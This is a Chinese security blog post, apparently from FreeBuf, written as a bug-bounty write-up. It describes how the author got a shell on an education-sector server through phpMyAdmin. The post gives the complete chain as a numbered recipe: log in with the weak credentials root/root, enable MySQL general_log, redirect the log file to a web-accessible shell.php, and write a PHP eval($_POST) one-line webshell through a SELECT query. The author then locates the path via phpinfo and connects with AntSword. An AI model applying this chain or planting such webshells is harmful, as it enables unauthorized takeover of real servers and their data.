freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

edusrc-通过phpmyadmin日志致getshell(后续推出证书站)
Z00Kiss123 2023-02-20 13:37:18 119876
所属地 广东省

扫描获取phpmyadmin并通过弱口令进入后台!

弱密码root root

查看mysql的日志状态

查看mysql的日志状态,默认是关闭的,因为这个日志的量非常大对资源是一个比较大的开销

show global variables like '%secure%';

1676869959_63f301473381b585d577b.png!small?1676869959365

general_log为是否支持写入

general_log_file为日志保存的位置

打开日志读写setglobal general_log =on;

1676870004_63f301744a0cb31f8eebe.png!small?1676870004433

修改邮箱日志路径

1676870941_63f3051d5082b583d0dfa.png!small?1676870941302

修改一下路径set global general_log_file='C:\myphp_www\PHPTutorial\MySQL\data\shell.php';

1676870967_63f3053722b174ea37775.png!small?1676870967060

写入马

将马写入日志中!!!

通过select查询操作写入日志

1676870530_63f30382c7bde1ab763f3.png!small?1676870530852

查看一下是否写入:select '<?php @eval($_POST[xxx]); ?';>

1676870996_63f30554b7abe9d9b551a.png!small?1676870996856

成功写入

1676870166_63f302160e6ab805fd74b.png!small?1676870166435

再通过phpinfo查找一下绝对路径

1676870124_63f301ecee82cb667f5be.png!small?1676870125151

最后成功连接

1676871024_63f30570045b7a3f67a63.png!small?1676871024248

1676870214_63f30246dfcade6355214.png!small?1676870214932

1676870227_63f3025353716fb1c304e.png!small?1676870227240

总结步骤:

1、SHOW VARIABLES LIKE '%general%' 查看配置默认是关闭状态

2、set global general_log = on; 开启general_log模式

3、set global general_log_file='日志路径\shell.php'; 修改日志目录为shell地址

(set global general_log_file='C:\myphp_www\PHPTutorial\WWW\public\shell.php';)

4、select ' <?php eval($_POST[cc]);? '

写入shell因为开启了日志记录功能,所执行的sql语句都会被记录在日志中

5.日志路径通过扫描端口phpinfo.php获得

6.连接蚁剑!

# web安全 # phpMyAdmin # getshell漏洞 # EDU # SRC漏洞挖掘
本文为 Z00Kiss123 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
Z00Kiss123 LV.2
这家伙太懒了,还未填写个人描述!
  • 2 文章数
  • 0 关注者
edusrc某证书站挖掘分享(越权)
2023-02-20